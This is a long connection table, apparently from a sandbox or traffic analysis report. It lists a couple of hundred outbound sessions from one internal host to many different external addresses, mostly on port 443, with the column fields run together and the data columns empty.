                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20296192.168.2.1444186116.54.87.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20297192.168.2.1441642190.119.238.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20298192.168.2.145763453.153.178.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20299192.168.2.1459252162.130.85.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20300192.168.2.1444302192.209.79.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20301192.168.2.1442158140.100.221.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20302192.168.2.1446298152.254.55.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20303192.168.2.14530228.166.171.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20304192.168.2.145678068.80.183.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20305192.168.2.1436942115.65.140.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20306192.168.2.1447482191.85.89.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20307192.168.2.14537124.91.40.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20308192.168.2.1455898174.190.88.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20309192.168.2.146073639.53.51.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20310192.168.2.1437058149.24.191.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20311192.168.2.1445598164.255.74.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20312192.168.2.1458108191.125.99.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20313192.168.2.143849017.147.20.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20314192.168.2.1448322117.95.8.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20315192.168.2.145711867.211.112.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20316192.168.2.14549745.180.50.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20317192.168.2.1451130154.222.34.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20318192.168.2.14471204.39.246.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20319192.168.2.1459564138.237.26.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20320192.168.2.144177472.121.225.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20321192.168.2.1455896113.16.19.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20322192.168.2.1442840121.25.79.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20323192.168.2.1443788193.197.87.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20324192.168.2.1451542124.213.9.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20325192.168.2.143463612.121.112.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20326192.168.2.144311258.252.28.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20327192.168.2.143730034.113.90.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20328192.168.2.143370613.73.140.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20329192.168.2.1440534150.230.48.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20330192.168.2.145025874.7.108.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20331192.168.2.1448694202.95.232.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20332192.168.2.1446060130.80.144.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20333192.168.2.144325491.72.109.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20334192.168.2.1452692111.230.81.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20335192.168.2.143387067.59.8.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20336192.168.2.1454982161.52.23.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20337192.168.2.144078842.123.6.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20338192.168.2.1434902204.19.154.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20339192.168.2.145339060.18.110.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20340192.168.2.1453226182.103.86.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20341192.168.2.1443536190.13.182.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20342192.168.2.14329721.136.159.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20343192.168.2.144154467.6.86.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20344192.168.2.143691434.119.229.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20345192.168.2.1448330149.102.94.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20346192.168.2.145013097.214.201.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20347192.168.2.144584890.77.34.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20348192.168.2.143377217.68.46.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20349192.168.2.1442782146.185.168.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20350192.168.2.14556401.153.100.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20351192.168.2.145723887.49.142.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20352192.168.2.1457646132.112.178.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20353192.168.2.1449772180.3.211.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20354192.168.2.145570820.105.197.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20355192.168.2.145914046.234.125.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20356192.168.2.1449894126.139.191.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20357192.168.2.1449106106.235.58.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20358192.168.2.143689420.149.120.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20359192.168.2.145447886.228.244.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20360192.168.2.1459430194.211.213.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20361192.168.2.1447536105.212.99.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20362192.168.2.145107697.13.164.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20363192.168.2.1452334196.238.131.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20364192.168.2.14471841.41.135.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20365192.168.2.1433892105.199.106.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20366192.168.2.1439600217.219.209.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20367192.168.2.1441354140.9.36.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20368192.168.2.1443386121.8.75.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20369192.168.2.1437768102.123.171.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20370192.168.2.14581488.71.65.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20371192.168.2.1460894100.211.195.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20372192.168.2.144247873.60.41.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20373192.168.2.1435006199.92.220.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20374192.168.2.1435524143.207.23.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20375192.168.2.1455814157.243.105.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20376192.168.2.145665098.253.117.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20377192.168.2.144534647.119.229.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20378192.168.2.144246041.232.107.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20379192.168.2.144702695.29.12.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20380192.168.2.145835676.58.64.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20381192.168.2.1439240155.131.191.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20382192.168.2.144450888.200.174.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20383192.168.2.1437764113.225.172.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20384192.168.2.143872670.65.67.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20385192.168.2.1452382131.58.211.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20386192.168.2.1434494217.125.147.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20387192.168.2.144962873.76.42.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20388192.168.2.1457390100.8.149.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20389192.168.2.144800646.231.137.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20390192.168.2.144028091.75.126.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20391192.168.2.143440298.106.95.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20392192.168.2.144939065.17.17.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20393192.168.2.145993651.163.114.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20394192.168.2.145927637.226.189.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20395192.168.2.1440930144.46.151.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20396192.168.2.145648251.27.11.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20397192.168.2.144625432.168.203.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20398192.168.2.1441508138.114.190.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20399192.168.2.1438504123.141.250.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20400192.168.2.1444942117.134.62.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20401192.168.2.1446940208.97.245.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20402192.168.2.1444566130.163.91.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20403192.168.2.1450336168.8.247.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20404192.168.2.1456860115.159.106.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20405192.168.2.1441858219.196.137.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20406192.168.2.145267264.91.236.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20407192.168.2.1450492144.215.12.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20408192.168.2.145660477.255.175.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20409192.168.2.1458996166.253.254.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20410192.168.2.1444772212.182.232.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20411192.168.2.1457360138.230.165.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20412192.168.2.144427070.218.67.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20413192.168.2.143592227.147.100.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20414192.168.2.14357124.64.23.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20415192.168.2.1434482222.33.115.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20416192.168.2.145439832.243.86.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20417192.168.2.1456802142.209.92.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20418192.168.2.144869489.224.171.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20419192.168.2.1443540184.169.141.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20420192.168.2.1441070203.41.203.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20421192.168.2.145261039.135.201.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20422192.168.2.1459954181.103.212.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20423192.168.2.1454200207.68.40.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20424192.168.2.1440932212.62.54.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20425192.168.2.1438946184.51.130.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20426192.168.2.1435750104.95.172.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20427192.168.2.1436992153.137.75.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20428192.168.2.14530609.71.151.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20429192.168.2.1456160179.16.61.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20430192.168.2.1447810175.42.14.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20431192.168.2.1451202148.231.214.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20432192.168.2.145421041.237.129.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20433192.168.2.1454846132.88.117.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20434192.168.2.144915291.30.38.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20435192.168.2.1460472191.191.154.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20436192.168.2.145909638.141.12.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20437192.168.2.1438466112.20.51.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20438192.168.2.1435818152.227.112.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20439192.168.2.1435730199.67.72.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20440192.168.2.1457708104.47.134.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20441192.168.2.1458690138.148.241.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20442192.168.2.1457352160.8.13.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20443192.168.2.1447910133.114.27.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20444192.168.2.1459756145.244.222.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20445192.168.2.1438164176.196.71.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20446192.168.2.1457698118.153.59.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20447192.168.2.144187672.90.128.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20448192.168.2.144811224.59.116.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20449192.168.2.1441230180.70.34.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20450192.168.2.1459956174.78.95.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20451192.168.2.1442110181.223.35.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20452192.168.2.1437136107.228.86.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20453192.168.2.143872442.115.96.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20454192.168.2.1438790200.93.255.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20455192.168.2.1445722170.122.163.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20456192.168.2.145166065.224.97.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20457192.168.2.144173244.208.135.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20458192.168.2.144558692.76.52.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20459192.168.2.145577289.124.37.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20460192.168.2.1448900167.157.122.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20461192.168.2.143343865.201.115.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20462192.168.2.145878257.187.126.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20463192.168.2.143795236.201.66.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20464192.168.2.144076893.248.79.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20465192.168.2.1438154181.77.12.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20466192.168.2.144394093.185.181.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20467192.168.2.1435008150.19.94.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20468192.168.2.144754025.3.139.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20469192.168.2.1437430163.12.84.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20470192.168.2.1452562213.79.114.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20471192.168.2.1437340145.84.133.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20472192.168.2.1443204112.51.6.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20473192.168.2.1452638202.233.249.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20474192.168.2.143282853.91.72.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20475192.168.2.1438044164.57.224.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20476192.168.2.145339462.193.26.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20477192.168.2.1432964193.114.26.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20478192.168.2.145105625.75.113.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20479192.168.2.1447490170.218.179.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20480192.168.2.1448026122.61.78.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20481192.168.2.1451078117.124.18.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20482192.168.2.145424280.79.194.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20483192.168.2.143464850.37.231.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20484192.168.2.145652217.123.140.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20485192.168.2.1449594175.38.251.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20486192.168.2.1457748148.128.229.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20487192.168.2.1443958155.126.158.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20488192.168.2.143989897.23.205.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20489192.168.2.1433892111.237.114.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20490192.168.2.1460238148.209.118.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20491192.168.2.1449208192.172.145.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20492192.168.2.143900224.212.239.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20493192.168.2.1447336190.14.233.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20494192.168.2.1439188205.3.129.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20495192.168.2.1449924162.58.133.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20496192.168.2.1440452158.146.125.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20497192.168.2.1434614221.206.28.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20498192.168.2.14593002.216.119.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20499192.168.2.143527651.202.178.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20500192.168.2.1440250123.108.39.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20501192.168.2.1451716120.35.142.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20502192.168.2.1434162163.250.44.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20503192.168.2.1443196206.230.225.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20504192.168.2.143868874.208.94.2008080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20505192.168.2.143918853.141.49.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20506192.168.2.1435480197.11.195.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20507192.168.2.1447436178.97.89.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20508192.168.2.1453010145.76.65.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20509192.168.2.143790675.68.231.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20510192.168.2.145801059.0.169.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20511192.168.2.1435040140.165.22.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20512192.168.2.1450754206.202.212.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20513192.168.2.1434894222.171.213.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20514192.168.2.1435574154.34.145.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20515192.168.2.1449480109.177.164.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20516192.168.2.1447074116.166.130.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      20517192.168.2.145086032.252.186.215443
